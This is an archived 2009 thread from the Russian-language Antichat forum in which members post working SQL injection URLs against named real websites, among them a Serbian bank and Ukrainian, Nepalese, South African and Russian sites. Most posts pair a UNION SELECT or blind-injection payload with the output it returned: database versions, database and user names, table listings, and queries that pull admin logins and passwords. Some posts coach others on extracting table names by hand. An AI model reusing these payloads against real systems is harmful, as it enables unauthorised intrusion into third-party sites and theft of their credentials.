ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9981  
Старый 21.06.2009, 21:41
+++AndreyDevil+++
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435

Репутация: 90
По умолчанию

сербский банк..

http://www.bankmeridian.com/eng/viewnews1.php?section=99&text_id=366+and+substring (version(),1,1)=3/*

эх
 
Ответить с цитированием

  #9982  
Старый 21.06.2009, 21:47
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.sewmach.com.ua/cat.php?cat=23&art=-114++union+select+1,2,concat(user_login,0x3a,user_ passw),4,5,6+from+auth_users

Database Version: 5.0.67-log
Database name: sew-mach
User name: sew-mach@localhost

Линия красоты

Код:
http://www.beauty-line.com.ua/cat.php?nom=cat&firm=-5+UNION+SELECT+CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),2,3,4
Database Version: 4.1.22
Database name: gezanne
User name: gezanne@localhost

Последний раз редактировалось Rubaka; 21.06.2009 в 21:57..
 
Ответить с цитированием

  #9983  
Старый 21.06.2009, 22:17
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.moe.com.np/terms.php?id=1'+union+select+1,2,3,4,5,6,7,user(), 9,10,11,12,13,14,15+--+

moecom_moe@localhost
 
Ответить с цитированием

  #9984  
Старый 21.06.2009, 22:22
ciberx
Новичок
Регистрация: 04.12.2007
Сообщений: 1
Провел на форуме:
8570

Репутация: 5
По умолчанию

http://onlinefoto.com.ua/backlinks/links.php?id=3092'

http://onlinefoto.com.ua/backlinks/links.php?id=3092'+union+select+1,2/*

БД
Database Version: 5.0.45-log
Database name: onlinefoto
User name: onlinefoto@localhost

Ток чет с таблицами никак не получается...(

Последний раз редактировалось ciberx; 21.06.2009 в 22:30..
 
Ответить с цитированием

  #9985  
Старый 21.06.2009, 22:29
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от ciberx  
http://onlinefoto.com.ua/backlinks/links.php?id=3092'+UNION+SEL ECT+1,CONCAT(0x7873716C696E6A626567696E,Version(), 0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C 696E6A656E64)+LIMIT+1,1/*

БД
Database Version: 5.0.45-log
Database name: onlinefoto
User name: onlinefoto@localhost

Ток чет с таблицами никак не получается...(

http://onlinefoto.com.ua/backlinks/links.php?id=3092'+union+select+1,group_concat(tab le_name)+from+information_schema.tables+group+by+t able_schema+limit+2,1/*

а ты крути руками а не SIPT'om
 
Ответить с цитированием

  #9986  
Старый 21.06.2009, 22:29
--StraNger--
Познающий
Регистрация: 04.01.2009
Сообщений: 94
Провел на форуме:
404716

Репутация: 145
Отправить сообщение для --StraNger-- с помощью ICQ
По умолчанию

Код:
http://www.bintec.ru/?mod=SiteNews&act=7&id=-1+union+select+1,concat_ws(0x3a,login,PASSWORD),3,4,5,6+from+ssp_AdminSet--+
 
Ответить с цитированием

  #9987  
Старый 21.06.2009, 23:38
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

PR 5
http://mahatma.com/php/showNews.php?newsid=67&linkid=16+and+substring(ver sion(),1,1)=x



Version : 5.0.81-community
Database : mahatmam_comdb
User : mahatmam_mahatma@localhost
Os : pc-linux-gnu



и сиптом все получается, главное запрос составить как надо...

http://onlinefoto.com.ua/backlinks/links.php?id=3092'+UNION+SELECT+1,AES_DECRYPT(AES_ ENCRYPT(CONCAT(0x7873716C696E6A626567696E,TABLE_NA ME,0x7873716C696E6A64656C,TABLE_SCHEMA,0x7873716C6 96E6A656E64),0x71),0x71)+FROM+INFORMATION_SCHEMA.T ABLES+LIMIT+45,1/*

16 :In database information_schema found table USER_PRIVILEGES
1 : GRANTEE
2 : TABLE_CATALOG
3 : PRIVILEGE_TYPE
4 : IS_GRANTABLE
17 :In database information_schema found table VIEWS
1 : TABLE_CATALOG
2 : TABLE_SCHEMA
3 : TABLE_NAME
4 : VIEW_DEFINITION
5 : CHECK_OPTION
6 : IS_UPDATABLE
7 : DEFINER
8 : SECURITY_TYPE
18 :In database onlinefoto found table replinks
1 : id
2 : linkdata
19 :In database onlinefoto found table sph_admins
1 : admin_id
2 : login
3 : password
bla bla bla

Последний раз редактировалось Gorev; 21.06.2009 в 23:41..
 
Ответить с цитированием

  #9988  
Старый 21.06.2009, 23:45
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.nirmaljoshi.com.np/jokes.php?id=-1'+union+select+1,2,3,unhex(hex(concat_ws(0x3a,use r(),database(),version()))),5,6+--+


siddhant123_data@82.197.131.19:siddhant123_data:4. 1.18-log

####################################
http://www.eastern.com.np/news/newsdetail.php?id=-1+union+select+1,2,version(),4,5,6,7--

5.0.77-community


admin:

http://www.eastern.com.np/news/newsdetail.php?id=-1+union+select+1,2,group_concat(column_name),4,5,6 ,7+from+information_schema.columns+where+table_nam e=0x75736572--

Последний раз редактировалось HAXTA4OK; 22.06.2009 в 00:05..
 
Ответить с цитированием

  #9989  
Старый 22.06.2009, 01:25
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
http://www.russellmania.com/index.php?id=35&dvd_id=-1137+union+select+version()--
Database Version: 5.0.77-community
Database name: mania_cms
User name: mania_user@localhost
 
Ответить с цитированием

  #9990  
Старый 22.06.2009, 01:30
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://www.milnerton.co.za/details.php?id=2965++union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),database(),user()),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+limit+1,1/*
version():5.0.38-Debian_2-log
database():milnertondb
user():34_milnertondb@localhost

Есть таблица prop_admin
__
Код:
http://www.rvtech.co.za/NewsView.php?Id=1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5+limit+1,1/*
version():5.0.32-Debian_7etch10
database():rvtech_db1
user():rvtech_1@dedi185.nur4.host-h.net

Есть таблица User

Последний раз редактировалось M.W.N.N.; 22.06.2009 в 01:33..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ